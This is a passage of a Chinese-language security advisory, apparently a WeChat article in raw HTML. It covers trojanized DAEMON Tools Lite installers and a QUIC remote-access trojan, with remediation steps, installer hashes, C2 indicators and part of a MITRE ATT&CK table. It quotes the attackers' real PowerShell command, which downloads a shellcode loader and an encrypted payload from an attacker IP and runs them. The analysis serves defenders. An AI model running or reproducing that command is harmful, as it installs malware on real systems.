[]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">cmd.exe /c powershell -NoProfile -Command &#34;$wc=New-Object System.Net.WebClient;$wc.DownloadFile(&#39;<a href="http://38.180.107.76/b3593ac2edb34f4d4d" target="_blank">http://38.180.107.76/b3593ac2edb34f4d4d</a>&#39;,&#39;C:\Windows\Temp\cdg.exe&#39;)&#34;&amp;&amp;powershell -NoProfile -Command &#34;$wc=New-Object System.Net.WebClient;$wc.DownloadFile(&#39;<a href="http://38.180.107.76/368b1365bd9176b359" target="_blank">http://38.180.107.76/368b1365bd9176b359</a>&#39;,&#39;%TEMP%\cdg.tmp&#39;)&#34;&amp;&amp;%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&amp;&amp;del %TEMP%\cdg.exe&amp;&amp;del %TEMP%\cdg.tmp</span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该命令下载两个文件：cdg.exe（shellcode加载器）和 cdg.tmp（RC4加密的shellcode），使用密钥&#34;first_match&#34;解密后执行。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员在部署脚本中发现了拼写错误，例如将 &#34;cipher&#34; 误写为 &#34;chiper&#34;，强烈表明攻击者在此阶段实施了人工键盘操作，而非完全自动化，具有鲜明的真人参与特征。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041840" src="https://wechat2rss.xlab.app/img-proxy/?k=ceadcc61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQLuM4GXb9H4KuAsIdJibB8k6QhjicWmwd5oKwiaaIYvVpDMcRfTA4RInibThaicDsHWMaDVwNVhJPT9bKsg7OMkRCxdrG5nu7ozGwQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">QUIC RAT（高级远程访问木马）</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已知仅部署至俄罗斯某教育机构的单台机器，是本次攻击中技术复杂度最高的植入物。主要技术特征：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">语言：C++ 实现，静态链接 WolfSSL 加密库</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">混淆：控制流平坦化（Control Flow Flattening）深度混淆</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">C2协议多样性：支持 HTTP、UDP、TCP、WSS、QUIC、DNS、HTTP/3 共7种协议</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">进程注入：可将恶意Payload注入 notepad.exe 和 conhost.exe 进程</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">反分析：高度混淆设计</span></p></li></ul></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041841" src="https://wechat2rss.xlab.app/img-proxy/?k=6634547c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTY8TCJ881EficQsAC0CNedviaYLJQpicsham2YvJicImFRLfCicly08QR4tdXTaoNAG8eVw0MAJwysVYZC3gzz5bbzCZMriao0SLb8A%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">建议处置流程</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1. 重点监控 DTHelper.exe、DiscSoftBusServiceLite.exe 的异常网络连接</span></p><p style="word-break: break-all;"><span leaf="">2. 检测向上述C2 IP/域名的出站HTTP GET请求</span></p><p style="word-break: break-all;"><span leaf="">3. 监控 notepad.exe 和 conhost.exe 的异常进程注入行为</span></p><p style="word-break: break-all;"><span leaf="">4. 检测系统中是否存在 cdg.exe 进程</span></p><p style="word-break: break-all;"><span leaf="">5. 停止使用受影响版本的 Daemon Tools，并使用安全工具扫描残留。</span></p><p style="word-break: break-all;"><span leaf="">6. 考虑到后门具备截获密码的能力，建议用户在清理系统后重置所有重要账号的密码。</span></p><p style="word-break: break-all;"><span leaf="">7. 检查并删除 %TEMP% 及 %APPDATA% 目录下可疑的随机名 DLL 文件。</span></p><p style="word-break: break-all;"><span leaf="">8. 仅安装官方确认安全的最新修复版本，并核对文件哈希值（Hash）。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041845" src="https://wechat2rss.xlab.app/img-proxy/?k=d7216821&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRQpxNsY6ETUlkKl8cQl0aMGKuhiaeFbqB3RbkICk9Wekc3mLtl57rhkBdxZ1ibUFNzScdh1ibv3THrkus6IORjkunSZ5NJa1lfcM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">IOC</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-weight: bold;">DAEMON Tools Lite安装程序hash</span></span></p><table style="border-collapse:collapse;width:99.9600%;border:none;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr style="height:30.4000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="line-height: 28pt;text-align: center;"><b><span style=""><font face="Times New Roman"><span leaf="">hash</span></font></span></b></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:1pt 1pt 1pt medium;border-style:solid solid solid none;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="line-height: 28pt;text-align: center;"><b><span style=""><font face="仿宋_GB2312"><span leaf="">版本</span></font></span></b></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">9ccd769624de98eeeb12714ff1707ec4f5bf196d</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2421</span></font></span></p></td></tr><tr style="height:56.7000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">50d47adb6dd45215c7cb4c68bae28b129ca09645</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2422</span></font></span></p></td></tr><tr style="height:55.4500pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">0c1d3da9c7a651ba40b40e12d48ebd32b3f31820</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2423</span></font></span></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">28b72576d67ae21d9587d782942628ea46dcc870</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2424</span></font></span></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">46b90bf370e60d61075d3472828fdc0b85ab0492</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2430</span></font></span></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">6325179f442e5b1a716580cd70dea644ac9ecd18</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2431</span></font></span></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">bd8fbb5e6842df8683163adbd6a36136164eac58</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2433</span></font></span></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="67.9600%" width="67.9600%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:宋体;mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="Arial"><span leaf="">15ed5c3384e12fe4314ad6edbd1dcccf5ac1ee29</span></font></span></p></td><td data-colwidth="32.0200%" width="32.0200%" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;vertical-align: top;"><span style="font-family: 宋体;color: rgb(51, 51, 51);font-style: normal;font-size: 11pt;"><font face="Arial"><span leaf="">12.5.0.2434</span></font></span></p></td></tr></tbody></table><p><span leaf=""><span textstyle="" style="font-weight: bold;">恶意C2</span></span></p><p><span leaf="">env-check.daemontools[.]cc</span></p><p><span leaf="">38.180.107[.]76</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">MITRE ATT&amp;CK:</span></span></p><table style="border-collapse:collapse;border:none;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;width:762px;"><tbody><tr style="height:25.8000pt;"><td data-colwidth="143" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:1.0000pt solid rgb(0,0,0);mso-border-left-alt:0.5000pt solid rgb(0,0,0);border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:1.0000pt solid rgb(0,0,0);mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(230,231,232);border-color:#d6d6d6;"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:middle;"><b><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-weight:bold;font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Tactic</span></span></b></p></td><td data-colwidth="221" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:1.0000pt solid rgb(0,0,0);mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(230,231,232);border-color:#d6d6d6;"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:middle;"><b><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-weight:bold;font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Technique</span></span></b></p></td><td data-colwidth="133" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:1.0000pt solid rgb(0,0,0);mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(230,231,232);border-color:#d6d6d6;"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:middle;"><b><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-weight:bold;font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">ID</span></span></b></p></td><td data-colwidth="265" width="274" valign="center" style="padding:0pt 5.4pt;border-width:1pt 1pt 1pt medium;border-style:solid solid solid none;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:middle;"><b><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-weight:bold;font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">说明</span></font></span></b></p></td></tr><tr><td data-colwidth="143" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:1.0000pt solid rgb(0,0,0);mso-border-left-alt:0.5000pt solid rgb(0,0,0);border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Initial Access</span></span></p></td><td data-colwidth="221" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Supply Chain Compromise</span></span></p></td><td data-colwidth="133" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">T1195.002</span></span></p></td><td data-colwidth="265" width="274" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">污染官方软件分发渠道</span></font></span></p></td></tr><tr><td data-colwidth="143" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:1.0000pt solid rgb(0,0,0);mso-border-left-alt:0.5000pt solid rgb(0,0,0);border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Execution</span></span></p></td><td data-colwidth="221" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">User Execution</span></span></p></td><td data-colwidth="133" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid 